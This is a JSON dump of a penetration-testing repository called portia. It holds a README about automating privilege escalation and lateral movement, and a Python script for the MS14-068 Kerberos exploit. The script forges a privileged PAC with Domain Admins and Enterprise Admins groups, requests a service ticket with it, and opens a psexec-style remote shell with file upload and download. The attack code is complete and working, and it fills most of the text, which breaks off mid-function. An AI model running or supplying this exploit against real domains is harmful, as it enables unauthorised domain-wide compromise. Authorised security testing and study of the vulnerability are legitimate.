[
  {
    "path": "README.md",
    "content": "# portia\n\nPortia aims to automate a number of techniques commonly performed on internal network penetration tests after a low privileged account has been compromised\n- Privilege escalation\n- Lateral movement\n- Convenience modules\n\nPortia is a genus of jumping spider that feeds on other spiders - known for their intelligent hunting behaviour and problem solving capabilities usually only found in larger animals\n  \n#Slides   \nhttps://docs.google.com/presentation/d/1x_1bjCCD5hwJFWzlHM0lEPOHdWUlfYgjkUYBtdBFEmM/pub?start=false&loop=false&delayms=3000  \n\n#Videos (Will be adding more soon)  \nVideo that shows privilege escalation via impersonation tokens and running of post exploitation modules  \nhttps://asciinema.org/a/45ry3g26devqcabpugwyz4to5  \n\n#Dependencies\n```\npip install pysmb tabulate termcolor xmltodict impacket\n\napt install autoconf automake autopoint libtool pkg-config\nmkdir /pentest\ncd/pentest\ngit clone https://github.com/libyal/libesedb.git\ncd libesedb\n./synclibs.sh\n./autogen.sh\ncd /pentest\ngit clone https://github.com/csababarta/ntdsxtract\ncd ntdsxtract\npython setup.py install\n```\n"
  },
  {
    "path": "deps/__init__.py",
    "content": ""
  },
  {
    "path": "deps/goldenPac.py",
    "content": "#!/usr/bin/env python\n# Copyright (c) 2003-2016 CORE Security Technologies\n#\n# This software is provided under under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Author: Alberto Solino (@agsolino)\n#\n# Description:\n#   MS14-068 Exploit. Kudos to @BiDOrD for pulling it up first! \n#   Well done :).\n#   This one also established a SMBConnection and PSEXEcs the \n#   target.\n#   A few important things:\n#   1) you must use the domain FQDN or use -dc-ip switch\n#   2) target must be a FQDN as well and matching the target's NetBIOS \n#   3) Just RC4 at the moment - DONE (aes256 added)\n#   4) It won't work on Kerberos-only Domains (but can be fixed)\n#   5) Use WMIEXEC approach instead\n#\n#   E.G:\n#       python goldenPac domain.net/normaluser@domain-host\n#       the password will be asked, or\n#\n#       python goldenPac.py domain.net/normaluser:mypwd@domain-host\n#\n#       if domain.net and/or domain-host do not resolve, add them\n#       to the hosts file or use the -dc-ip and -target-ip parameters\n#\n\nimport sys\nimport cmd\nimport logging\nimport os\nimport random\nimport string\nimport time\nfrom binascii import unhexlify\nfrom threading import Thread, Lock\nfrom impacket.dcerpc.v5 import epm\nfrom impacket.dcerpc.v5.drsuapi import MSRPC_UUID_DRSUAPI, hDRSDomainControllerInfo, DRSBind, NTDSAPI_CLIENT_GUID, \\\n    DRS_EXTENSIONS_INT, DRS_EXT_GETCHGREQ_V6, DRS_EXT_GETCHGREPLY_V6, DRS_EXT_GETCHGREQ_V8, DRS_EXT_STRONG_ENCRYPTION, \\\n    NULLGUID\nfrom impacket.dcerpc.v5.dtypes import RPC_SID, MAXIMUM_ALLOWED\nfrom impacket.dcerpc.v5.lsad import hLsarQueryInformationPolicy2, POLICY_INFORMATION_CLASS\nfrom impacket.dcerpc.v5.lsat import MSRPC_UUID_LSAT, hLsarOpenPolicy2, POLICY_LOOKUP_NAMES\nfrom impacket.dcerpc.v5.nrpc import MSRPC_UUID_NRPC, hDsrGetDcNameEx\nfrom impacket.dcerpc.v5.rpcrt import TypeSerialization1, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY\nfrom impacket.krb5.pac import PKERB_VALIDATION_INFO, KERB_VALIDATION_INFO, KERB_SID_AND_ATTRIBUTES, PAC_CLIENT_INFO, \\\n    PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, \\\n    PAC_PRIVSVR_CHECKSUM, PACTYPE\nfrom impacket.examples import logger\nfrom impacket.examples import remcomsvc, serviceinstall\n#from impacket.smbconnection import SMBConnection, smb\nfrom impacket.smbconnection import SMBConnection as SMBConnection2\nfrom impacket.smbconnection import smb\n\nfrom impacket.structure import Structure\nimport datetime\nfrom calendar import timegm\nfrom time import strptime\nfrom impacket import version\nfrom impacket.smbserver import getFileTime\nfrom impacket.dcerpc.v5 import samr\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.krb5.types import Principal, Ticket, KerberosTime\nfrom impacket.krb5 import constants\nfrom impacket.krb5.kerberosv5 import sendReceive, getKerberosTGT, getKerberosTGS, KerberosError\nfrom impacket.krb5.asn1 import AS_REP, TGS_REQ, AP_REQ, TGS_REP, Authenticator, EncASRepPart, AuthorizationData, \\\n        AD_IF_RELEVANT, seq_set, seq_set_iter, KERB_PA_PAC_REQUEST, \\\n        EncTGSRepPart, ETYPE_INFO2_ENTRY\nfrom impacket.krb5.crypto import Key\nfrom impacket.dcerpc.v5.ndr import NDRULONG\nfrom impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \\\n        SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD\nfrom pyasn1.codec.der import decoder, encoder\nfrom Crypto.Hash import MD5\n\n################################################################################\n# HELPER FUNCTIONS\n################################################################################\n\nclass RemComMessage(Structure):\n    structure = (\n        ('Command','4096s=\"\"'),\n        ('WorkingDir','260s=\"\"'),\n        ('Priority','<L=0x20'),\n        ('ProcessID','<L=0x01'),\n        ('Machine','260s=\"\"'),\n        ('NoWait','<L=0'),\n    )\n\nclass RemComResponse(Structure):\n    structure = (\n        ('ErrorCode','<L=0'),\n        ('ReturnCode','<L=0'),\n    )\n\nRemComSTDOUT         = \"RemCom_stdout\"\nRemComSTDIN          = \"RemCom_stdin\"\nRemComSTDERR         = \"RemCom_stderr\"\n\nlock = Lock()\ntotalOutput=\"\"\n\nclass PSEXEC1:\n    def __init__(self, command, username, domain, smbConnection, TGS, copyFile):\n        self.__username = username\n        self.__command = command\n        self.__path = None\n        self.__domain = domain\n        self.__exeFile = None\n        self.__copyFile = copyFile\n        self.__TGS = TGS\n        self.__smbConnection = smbConnection\n\t\n    def run(self, addr):\n        rpctransport = transport.SMBTransport(addr, filename='/svcctl', smb_connection=self.__smbConnection)\n        dce = rpctransport.get_dce_rpc()\n        try:\n            dce.connect()\n        except Exception, e:\n            logging.critical(str(e))\n            sys.exit(1)\n\n        global dialect\n        dialect = rpctransport.get_smb_connection().getDialect()\n\n        try:\n            unInstalled = False\n            s = rpctransport.get_smb_connection()\n\n            # We don't wanna deal with timeouts from now on.\n            s.setTimeout(100000)\n            if self.__exeFile is None:\n                installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())\n            else:\n                try:\n                    f = open(self.__exeFile)\n                except Exception, e:\n                    logging.critical(str(e))\n                    sys.exit(1)\n                installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), f)\n    \n            installService.install()\n\n            if self.__exeFile is not None:\n                f.close()\n\n            # Check if we need to copy a file for execution\n            if self.__copyFile is not None:\n                installService.copy_file(self.__copyFile, installService.getShare(), os.path.basename(self.__copyFile))\n                # And we change the command to be executed to this filename\n                self.__command = os.path.basename(self.__copyFile) + ' ' + self.__command\n\n            tid = s.connectTree('IPC$')\n            fid_main = self.openPipe(s,tid,'\\RemCom_communicaton',0x12019f)\n\n            packet = RemComMessage()\n            pid = os.getpid()\n\n            packet['Machine'] = ''.join([random.choice(string.letters) for _ in range(4)])\n            if self.__path is not None:\n                packet['WorkingDir'] = self.__path\n            packet['Command'] = self.__command\n            packet['ProcessID'] = pid\n\n            s.writeNamedPipe(tid, fid_main, str(packet))\n\n            # Here we'll store the command we type so we don't print it back ;)\n            # ( I know.. globals are nasty :P )\n            global LastDataSent\n            LastDataSent = ''\n\n            # Create the pipes threads\n            stdin_pipe = RemoteStdInPipe(rpctransport,\n                                         '\\%s%s%d' % (RemComSTDIN, packet['Machine'], packet['ProcessID']),\n                                         smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, self.__TGS,\n                                         installService.getShare())\n            stdin_pipe.start()\n            stdout_pipe = RemoteStdOutPipe(rpctransport,\n                                           '\\%s%s%d' % (RemComSTDOUT, packet['Machine'], packet['ProcessID']),\n                                           smb.FILE_READ_DATA)\n            stdout_pipe.start()\n            stderr_pipe = RemoteStdErrPipe(rpctransport,\n                                           '\\%s%s%d' % (RemComSTDERR, packet['Machine'], packet['ProcessID']),\n                                           smb.FILE_READ_DATA)\n            stderr_pipe.start()\n            \n            # And we stay here till the end\n\t    time.sleep(10)\n\t    print \"\\nPress the [enter] key\"\n            ans = s.readNamedPipe(tid,fid_main,4)\n            #ans = s.readNamedPipe(tid,fid_main,8)\n            if len(ans):\n                retCode = RemComResponse(ans)\n\t    \t #print getOutput()\n                logging.info(\"Process %s finished with ErrorCode: %d, ReturnCode: %d\" % (\n                self.__command, retCode['ErrorCode'], retCode['ReturnCode']))\n            installService.uninstall()\n            if self.__copyFile is not None:\n                # We copied a file for execution, let's remove it\n                s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))\n            unInstalled = True\n            #sys.exit(retCode['ErrorCode'])\n\n        except SystemExit:\n            raise\n        except:\n            if unInstalled is False:\n                installService.uninstall()\n                if self.__copyFile is not None:\n                    s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))\n            sys.stdout.flush()\n            #sys.exit(1)\n\n    def openPipe(self, s, tid, pipe, accessMask):\n        pipeReady = False\n        tries = 50\n        while pipeReady is False and tries > 0:\n            try:\n                s.waitNamedPipe(tid,pipe)\n                pipeReady = True\n            except:\n                tries -= 1\n                time.sleep(2)\n                pass\n\n        if tries == 0:\n            logging.critical('Pipe not ready, aborting')\n            raise\n\n        fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)\n\n        return fid\n\nclass Pipes(Thread):\n    def __init__(self, transport, pipe, permissions, TGS=None, share=None):\n        Thread.__init__(self)\n        self.server = 0\n        self.transport = transport\n        self.credentials = transport.get_credentials()\n        self.tid = 0\n        self.fid = 0\n        self.share = share\n        self.port = transport.get_dport()\n        self.pipe = pipe\n        self.permissions = permissions\n        self.TGS = TGS\n        self.daemon = True\n\n    def connectPipe(self):\n        try:\n            lock.acquire()\n            global dialect\n            self.server = SMBConnection2('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(),\n                                        sess_port=self.port, preferredDialect=dialect)\n            user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials\n            self.server.login(user, passwd, domain, lm, nt)\n            lock.release()\n            self.tid = self.server.connectTree('IPC$') \n\n            self.server.waitNamedPipe(self.tid, self.pipe)\n            self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)\n            self.server.setTimeout(1000000)\n        except:\n            logging.critical(\"Something wen't wrong connecting the pipes(%s), try again\" % self.__class__)\n\n\nclass RemoteStdOutPipe(Pipes):\n    def __init__(self, transport, pipe, permisssions):\n        Pipes.__init__(self, transport, pipe, permisssions)\n\n    def run(self):\n\tglobal totalOutput\n        self.connectPipe()\n        while True:\n            try:\n                ans = self.server.readFile(self.tid,self.fid, 0, 1024)\n            except:\n                pass\n            else:\n                try:\n                        global LastDataSent\n                        if ans != LastDataSent:\n\t\t\t    totalOutput+=ans\n                            #sys.stdout.write(ans)\n                            #sys.stdout.flush()\n                        else:\n                            # Don't echo what I sent, and clear it up\n                            LastDataSent = ''\n                        # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars, \n                        # it will give false positives tho.. we should find a better way to handle this.\n                        if LastDataSent > 10:\n                            LastDataSent = ''\n                except:\n                    pass\n\nclass RemoteStdErrPipe(Pipes):\n    def __init__(self, transport, pipe, permisssions):\n        Pipes.__init__(self, transport, pipe, permisssions)\n\n    def run(self):\n        self.connectPipe()\n        while True:\n            try:\n                ans = self.server.readFile(self.tid,self.fid, 0, 1024)\n            except:\n                pass\n            else:\n                try:\n                    sys.stderr.write(str(ans))\n                    sys.stderr.flush()\n                except:\n                    pass\n\nclass RemoteShell(cmd.Cmd):\n    def __init__(self, server, port, credentials, tid, fid, TGS, share):\n        cmd.Cmd.__init__(self, False)\n        self.prompt = '\\x08'\n        self.server = server\n        self.transferClient = None\n        self.tid = tid\n        self.fid = fid\n        self.credentials = credentials\n        self.share = share\n        self.port = port\n        self.TGS = TGS\n        self.intro = ''\n\t#[!] Press help for extra shell commands'\n    #def postloop(self):\n    #\treturn\n    def connect_transferClient(self):\n        self.transferClient = SMBConnection2('*SMBSERVER', self.server.getRemoteHost(), sess_port=self.port,\n                                            preferredDialect=dialect)\n        user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials\n        self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGS=self.TGS, useCache=False)\n\n    def do_help(self, line):\n        print \"\"\"\n lcd {path}                 - changes the current local directory to {path}\n exit                       - terminates the server process (and this session)\n put {src_file, dst_path}   - uploads a local file to the dst_path RELATIVE to the connected share (%s)\n get {file}                 - downloads pathname RELATIVE to the connected share (%s) to the current local dir \n ! {cmd}                    - executes a local shell cmd\n\"\"\" % (self.share, self.share)\n        self.send_data('\\r\\n', False)\n\n    def do_shell(self, s):\n        os.system(s)\n        self.send_data('\\r\\n')\n\treturn\n\n    def do_get(self, src_path):\n        try:\n            if self.transferClient is None:\n                self.connect_transferClient()\n\n            import ntpath\n            filename = ntpath.basename(src_path)\n            fh = open(filename,'wb')\n            logging.info(\"Downloading %s\\%s\" % (self.share, src_path))\n            self.transferClient.getFile(self.share, src_path, fh.write)\n            fh.close()\n        except Exception, e:\n            logging.error(str(e))\n            pass\n\n        self.send_data('\\r\\n')\n \n    def do_put(self, s):\n        try:\n            if self.transferClient is None:\n                self.connect_transferClient()\n            params = s.split(' ')\n            if len(params) > 1:\n                src_path = params[0]\n                dst_path = params[1]\n            elif len(params) == 1:\n                src_path = params[0]\n                dst_path = '/'\n\n            src_file = os.path.basename(src_path)\n            fh = open(src_path, 'rb')\n            f = dst_path + '/' + src_file\n            pathname = string.replace(f,'/','\\\\')\n            logging.info(\"Uploading %s to %s\\%s\" % (src_file, self.share, dst_path))\n            self.transferClient.putFile(self.share, pathname, fh.read)\n            fh.close()\n        except Exception, e:\n            logging.error(str(e))\n            pass\n\n        self.send_data('\\r\\n')\n\n\n    def do_lcd(self, s):\n        if s == '':\n            print os.getcwd()\n        else:\n            try:\n                os.chdir(s)\n            except Exception, e:\n                logging.error(str(e))\n        self.send_data('\\r\\n')\n\n    def emptyline(self):\n        self.send_data('\\r\\n')\n        return\n\n    def default(self, line):\n        self.send_data(line+'\\r\\n')\n\treturn True\n\n    def send_data(self, data, hideOutput = True):\n        if hideOutput is True:\n            global LastDataSent\n            LastDataSent = data\n        else:\n            LastDataSent = ''\n        try:\n\t        self.server.writeFile(self.tid, self.fid, data)\n\texcept:\n\t\tpass\n\treturn\n\nclass RemoteStdInPipe(Pipes):\n    def __init__(self, transport, pipe, permisssions, TGS=None, share=None):\n        Pipes.__init__(self, transport, pipe, permisssions, TGS, share)\n\n    def run(self):\n        self.connectPipe()\n        shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.TGS, self.share)\n        shell.cmdloop()\n\n\nclass MS14_068:\n    # 6.1.  Unkeyed Checksums\n    # Vulnerable DCs are accepting at least these unkeyed checksum types\n    CRC_32  = 1\n    RSA_MD4 = 2\n    RSA_MD5 = 7\n    class VALIDATION_INFO(TypeSerialization1):\n        structure = (\n            ('Data', PKERB_VALIDATION_INFO),\n        )\n\n    def __init__(self, target, targetIp=None, username='', password='', domain='', hashes=None, command='',\n                 copyFile=None, writeTGT=None, kdcHost=None):\n        self.__username = username\n        self.__password = password\n        self.__domain = domain\n        self.__rid = 0\n        self.__lmhash = ''\n        self.__nthash = ''\n        self.__target = target\n        self.__targetIp = targetIp\n        self.__kdcHost = None\n        self.__copyFile = copyFile\n        self.__command = command\n        self.__writeTGT = writeTGT\n        self.__domainSid = ''\n        self.__forestSid = None\n        self.__domainControllers = list()\n        self.__kdcHost = kdcHost\n\n\thashes=None\n        if hashes is not None:\n            self.__lmhash, self.__nthash = hashes.split(':')\n            self.__lmhash = unhexlify(self.__lmhash)\n            self.__nthash = unhexlify(self.__nthash)\n\n    def getGoldenPAC(self, authTime):\n        # Ok.. we need to build a PAC_TYPE with the following items\n\n        # 1) KERB_VALIDATION_INFO\n        aTime = timegm(strptime(str(authTime), '%Y%m%d%H%M%SZ'))\n\n        unixTime = getFileTime(aTime)\n\n        kerbdata = KERB_VALIDATION_INFO()\n\n        kerbdata['LogonTime']['dwLowDateTime']           = unixTime & 0xffffffff\n        kerbdata['LogonTime']['dwHighDateTime']          = unixTime >>32\n\n        # LogoffTime: A FILETIME structure that contains the time the client's logon \n        # session should expire. If the session should not expire, this structure \n        # SHOULD have the dwHighDateTime member set to 0x7FFFFFFF and the dwLowDateTime \n        # member set to 0xFFFFFFFF. A recipient of the PAC SHOULD<7> use this value as \n        # an indicator of when to warn the user that the allowed time is due to expire.\n        kerbdata['LogoffTime']['dwLowDateTime']          = 0xFFFFFFFF\n        kerbdata['LogoffTime']['dwHighDateTime']         = 0x7FFFFFFF\n\n        # KickOffTime: A FILETIME structure that contains LogoffTime minus the user \n        # account's forceLogoff attribute ([MS-ADA1] section 2.233) value. If the \n        # client should not be logged off, this structure SHOULD have the dwHighDateTime \n        # member set to 0x7FFFFFFF and the dwLowDateTime member set to 0xFFFFFFFF. \n        # The Kerberos service ticket end time is a replacement for KickOffTime. \n        # The service ticket lifetime SHOULD NOT be set longer than the KickOffTime of \n        # an account. A recipient of the PAC SHOULD<8> use this value as the indicator \n        # of when the client should be forcibly disconnected.\n        kerbdata['KickOffTime']['dwLowDateTime']         = 0xFFFFFFFF\n        kerbdata['KickOffTime']['dwHighDateTime']        = 0x7FFFFFFF\n\n        kerbdata['PasswordLastSet']['dwLowDateTime']     = 0\n        kerbdata['PasswordLastSet']['dwHighDateTime']    = 0\n\n        kerbdata['PasswordCanChange']['dwLowDateTime']   = 0\n        kerbdata['PasswordCanChange']['dwHighDateTime']  = 0\n        \n        # PasswordMustChange: A FILETIME structure that contains the time at which\n        # theclient's password expires. If the password will not expire, this \n        # structure MUST have the dwHighDateTime member set to 0x7FFFFFFF and the \n        # dwLowDateTime member set to 0xFFFFFFFF.\n        kerbdata['PasswordMustChange']['dwLowDateTime']  = 0xFFFFFFFF\n        kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF\n\n        kerbdata['EffectiveName']      = self.__username\n        kerbdata['FullName']           = ''\n        kerbdata['LogonScript']        = ''\n        kerbdata['ProfilePath']        = ''\n        kerbdata['HomeDirectory']      = ''\n        kerbdata['HomeDirectoryDrive'] = ''\n        kerbdata['LogonCount']         = 0\n        kerbdata['BadPasswordCount']   = 0\n        kerbdata['UserId']             = self.__rid\n        kerbdata['PrimaryGroupId']     = 513\n        \n        # Our Golden Well-known groups! :)\n        groups = (513, 512, 520, 518, 519)\n        kerbdata['GroupCount']         = len(groups)\n\n        for group in groups:\n            groupMembership = GROUP_MEMBERSHIP()\n            groupId = NDRULONG()\n            groupId['Data'] = group\n            groupMembership['RelativeId'] = groupId\n            groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED\n            kerbdata['GroupIds'].append(groupMembership)\n\n        kerbdata['UserFlags']         = 0\n        kerbdata['UserSessionKey']    = '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n        kerbdata['LogonServer']       = ''\n        kerbdata['LogonDomainName']   = self.__domain\n        kerbdata['LogonDomainId']     = self.__domainSid\n        kerbdata['LMKey']             = '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n        kerbdata['UserAccountControl']= USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD\n        kerbdata['SubAuthStatus']     = 0\n        kerbdata['LastSuccessfulILogon']['dwLowDateTime']  = 0\n        kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0\n        kerbdata['LastFailedILogon']['dwLowDateTime']      = 0\n        kerbdata['LastFailedILogon']['dwHighDateTime']     = 0\n        kerbdata['FailedILogonCount'] = 0\n        kerbdata['Reserved3']         = 0\n\n        # AUTHENTICATION_AUTHORITY_ASSERTED_IDENTITY: A SID that means the client's identity is \n        # asserted by an authentication authority based on proof of possession of client credentials.\n        #extraSids = ('S-1-18-1',)\n        if self.__forestSid is not None:\n            extraSids = ('%s-%s' % (self.__forestSid, '519'),)\n            kerbdata['SidCount']          = len(extraSids)\n            kerbdata['UserFlags'] |= 0x20\n        else:\n            extraSids = ()\n            kerbdata['SidCount']          = len(extraSids)\n        \n        for extraSid in extraSids:\n            sidRecord = KERB_SID_AND_ATTRIBUTES()\n            sid = RPC_SID()\n            sid.fromCanonical(extraSid)\n            sidRecord['Sid'] = sid\n            sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED\n            kerbdata['ExtraSids'].append(sidRecord)\n\n        kerbdata['ResourceGroupDomainSid'] = NULL\n        kerbdata['ResourceGroupCount'] = 0\n        kerbdata['ResourceGroupIds'] = NULL\n            \n        validationInfo = self.VALIDATION_INFO()\n        validationInfo['Data'] = kerbdata\n\n        if logging.getLogger().level == logging.DEBUG:\n            logging.debug('VALIDATION_INFO')\n            validationInfo.dump()\n            print ('\\n')\n\n        validationInfoBlob = validationInfo.getData()+validationInfo.getDataReferents()\n        validationInfoAlignment = '\\x00'*(((len(validationInfoBlob)+7)/8*8)-len(validationInfoBlob))\n\n        # 2) PAC_CLIENT_INFO\n        pacClientInfo = PAC_CLIENT_INFO()\n        pacClientInfo['ClientId'] = unixTime\n        try:\n            name = self.__username.encode('utf-16le')\n        except UnicodeDecodeError:\n            import sys\n            name = self.__username.decode(sys.getfilesystemencoding()).encode('utf-16le')\n        pacClientInfo['NameLength'] = len(name)\n        pacClientInfo['Name'] = name\n        pacClientInfoBlob = str(pacClientInfo)\n        pacClientInfoAlignment = '\\x00'*(((len(pacClientInfoBlob)+7)/8*8)-len(pacClientInfoBlob))\n\n        # 3) PAC_SERVER_CHECKSUM/PAC_SIGNATURE_DATA\n        serverChecksum = PAC_SIGNATURE_DATA()\n\n        # If you wanna do CRC32, uncomment this\n        #serverChecksum['SignatureType'] = self.CRC_32\n        #serverChecksum['Signature'] = '\\x00'*4\n\n        # If you wanna do MD4, uncomment this\n        #serverChecksum['SignatureType'] = self.RSA_MD4\n        #serverChecksum['Signature'] = '\\x00'*16\n\n        # If you wanna do MD5, uncomment this\n        serverChecksum['SignatureType'] = self.RSA_MD5\n        serverChecksum['Signature'] = '\\x00'*16\n\n        serverChecksumBlob = str(serverChecksum)\n        serverChecksumAlignment = '\\x00'*(((len(serverChecksumBlob)+7)/8*8)-len(serverChecksumBlob))\n\n        # 4) PAC_PRIVSVR_CHECKSUM/PAC_SIGNATURE_DATA\n        privSvrChecksum = PAC_SIGNATURE_DATA()\n\n        # If you wanna do CRC32, uncomment this\n        #privSvrChecksum['SignatureType'] = self.CRC_32\n        #privSvrChecksum['Signature'] = '\\x00'*4\n\n        # If you wanna do MD4, uncomment this\n        #privSvrChecksum['SignatureType'] = self.RSA_MD4\n        #privSvrChecksum['Signature'] = '\\x00'*16\n\n        # If you wanna do MD5, uncomment this\n        privSvrChecksum['SignatureType'] = self.RSA_MD5\n        privSvrChecksum['Signature'] = '\\x00'*16\n\n        privSvrChecksumBlob = str(privSvrChecksum)\n        privSvrChecksumAlignment = '\\x00'*(((len(privSvrChecksumBlob)+7)/8*8)-len(privSvrChecksumBlob))\n\n        # The offset are set from the beginning of the PAC_TYPE\n        # [MS-PAC] 2.4 PAC_INFO_BUFFER\n        offsetData = 8 + len(str(PAC_INFO_BUFFER()))*4\n\n        # Let's build the PAC_INFO_BUFFER for each one of the elements\n        validationInfoIB = PAC_INFO_BUFFER()\n        validationInfoIB['ulType'] = PAC_LOGON_INFO\n        validationInfoIB['cbBufferSize'] =  len(validationInfoBlob)\n        validationInfoIB['Offset'] = offsetData\n        offsetData = (offsetData+validationInfoIB['cbBufferSize'] + 7) /8 *8\n\n        pacClientInfoIB = PAC_INFO_BUFFER()\n        pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE\n        pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)\n        pacClientInfoIB['Offset'] = offsetData\n        offsetData = (offsetData+pacClientInfoIB['cbBufferSize'] + 7) /8 *8\n\n        serverChecksumIB = PAC_INFO_BUFFER()\n        serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM\n        serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)\n        serverChecksumIB['Offset'] = offsetData\n        offsetData = (offsetData+serverChecksumIB['cbBufferSize'] + 7) /8 *8\n\n        privSvrChecksumIB = PAC_INFO_BUFFER()\n        privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM\n        privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)\n        privSvrChecksumIB['Offset'] = offsetData\n        #offsetData = (offsetData+privSvrChecksumIB['cbBufferSize'] + 7) /8 *8\n\n        # Building the PAC_TYPE as specified in [MS-PAC]\n        buffers = str(validationInfoIB) + str(pacClientInfoIB) + str(serverChecksumIB) + str(\n            privSvrChecksumIB) + validationInfoBlob + validationInfoAlignment + str(\n            pacClientInfo) + pacClientInfoAlignment\n        buffersTail = str(serverChecksum) + serverChecksumAlignment + str(privSvrChecksum) + privSvrChecksumAlignment\n\n        pacType = PACTYPE()\n        pacType['cBuffers'] = 4\n        pacType['Version'] = 0\n        pacType['Buffers'] = buffers + buffersTail\n\n        blobToChecksum = str(pacType)\n\n        # If you want to do CRC-32, ucomment this\n        #serverChecksum['Signature'] = struct.pack('<L', (binascii.crc32(blobToChecksum, 0xffffffff) ^ 0xffffffff) & 0xffffffff)\n        #privSvrChecksum['Signature'] =  struct.pack('<L', (binascii.crc32(serverChecksum['Signature'], 0xffffffff) ^ 0xffffffff) & 0xffffffff)\n\n        # If you want to do MD4, ucomment this\n        #serverChecksum['Signature'] = MD4.new(blobToChecksum).digest()\n        #privSvrChecksum['Signature'] =  MD4.new(serverChecksum['Signature']).digest()\n\n        # If you want to do MD5, ucomment this\n        serverChecksum['Signature'] = MD5.new(blobToChecksum).digest()\n        privSvrChecksum['Signature'] = MD5.new(serverChecksum['Signature']).digest() \n\n        buffersTail = str(serverChecksum) + serverChecksumAlignment + str(privSvrChecksum) + privSvrChecksumAlignment\n        pacType['Buffers'] = buffers + buffersTail\n\n        authorizationData = AuthorizationData()\n        authorizationData[0] = None\n        authorizationData[0]['ad-type'] = int(constants.AuthorizationDataType.AD_WIN2K_PAC.value)\n        authorizationData[0]['ad-data'] = str(pacType)\n        return encoder.encode(authorizationData)\n\n    def getKerberosTGS(self, serverName, domain, kdcHost, tgt, cipher, sessionKey, authTime):\n        # Get out Golden PAC\n        goldenPAC = self.getGoldenPAC(authTime)\n\n        decodedTGT = decoder.decode(tgt, asn1Spec = AS_REP())[0]\n\n        # Extract the ticket from the TGT\n        ticket = Ticket()\n        ticket.from_asn1(decodedTGT['ticket'])\n\n        # Now put the goldenPac inside the AuthorizationData AD_IF_RELEVANT\n        ifRelevant = AD_IF_RELEVANT()\n        ifRelevant[0] = None\n        ifRelevant[0]['ad-type'] = int(constants.AuthorizationDataType.AD_IF_RELEVANT.value)\n        ifRelevant[0]['ad-data'] = goldenPAC\n\n        encodedIfRelevant = encoder.encode(ifRelevant)\n\n        # Key Usage 4\n        # TGS-REQ KDC-REQ-BODY AuthorizationData, encrypted with\n        # the TGS session key (Section 5.4.1)\n        encryptedEncodedIfRelevant = cipher.encrypt(sessionKey, 4, encodedIfRelevant, None)\n\n        tgsReq = TGS_REQ()\n        reqBody = seq_set(tgsReq, 'req-body')\n\n        opts = list()\n        opts.append( constants.KDCOptions.forwardable.value )\n        opts.append( constants.KDCOptions.renewable.value )\n        opts.append( constants.KDCOptions.proxiable.value )\n\n        reqBody['kdc-options'] = constants.encodeFlags(opts)\n        seq_set(reqBody, 'sname', serverName.components_to_asn1)\n        reqBody['realm'] = str(decodedTGT['crealm'])\n\n        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)\n\n        reqBody['till'] = KerberosTime.to_asn1(now)\n        reqBody['nonce'] = random.SystemRandom().getrandbits(31)\n        seq_set_iter(reqBody, 'etype', (cipher.enctype,))\n        reqBody['enc-authorization-data'] = None\n        reqBody['enc-authorization-data']['etype'] = int(cipher.enctype)\n        reqBody['enc-authorization-data']['cipher'] = encryptedEncodedIfRelevant\n\n        apReq = AP_REQ()\n        apReq['pvno'] = 5\n        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)\n\n        opts = list()\n        apReq['ap-options'] =  constants.encodeFlags(opts)\n        seq_set(apReq,'ticket', ticket.to_asn1)\n\n        authenticator = Authenticator()\n        authenticator['authenticator-vno'] = 5\n        authenticator['crealm'] = str(decodedTGT['crealm'])\n\n        clientName = Principal()\n        clientName.from_asn1( decodedTGT, 'crealm', 'cname')\n\n        seq_set(authenticator, 'cname', clientName.components_to_asn1)\n\n        now = datetime.datetime.utcnow() \n        authenticator['cusec'] =  now.microsecond\n        authenticator['ctime'] = KerberosTime.to_asn1(now)\n\n        encodedAuthenticator = encoder.encode(authenticator)\n\n        # Key Usage 7\n        # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes\n        # TGS authenticator subkey), encrypted with the TGS session\n        # key (Section 5.5.1)\n        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)\n\n        apReq['authenticator'] = None\n        apReq['authenticator']['etype'] = cipher.enctype\n        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator\n\n        